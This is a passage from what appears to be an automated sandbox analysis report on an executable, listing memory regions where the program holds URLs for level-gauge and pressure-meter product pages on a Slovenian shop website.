                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/wika-merilniki-nivoja/dodatki-za-merilce-ni
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/wika-merilniki-nivoja/opticna-stikala-nivoj
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/wika-merilniki-nivoja/plavajoca-stikala/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/wika-merilniki-nivoja/potopni-hidrostaticni
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/wika-merilniki-nivoja/prikazovalniki-nivoja
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/wika-merilniki-nivoja/zvezno-merjenje-nivoj
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-ph-co2-prevodnosti-vakuuma-vsebnosti-soli-kvalitet
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/digitalni-manometri/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/elektricni-pribor-za-merilnike-tlaka/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/kontaktni-manometri-2/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/manometri-z-izhodnim-signalom/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/manometri/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: 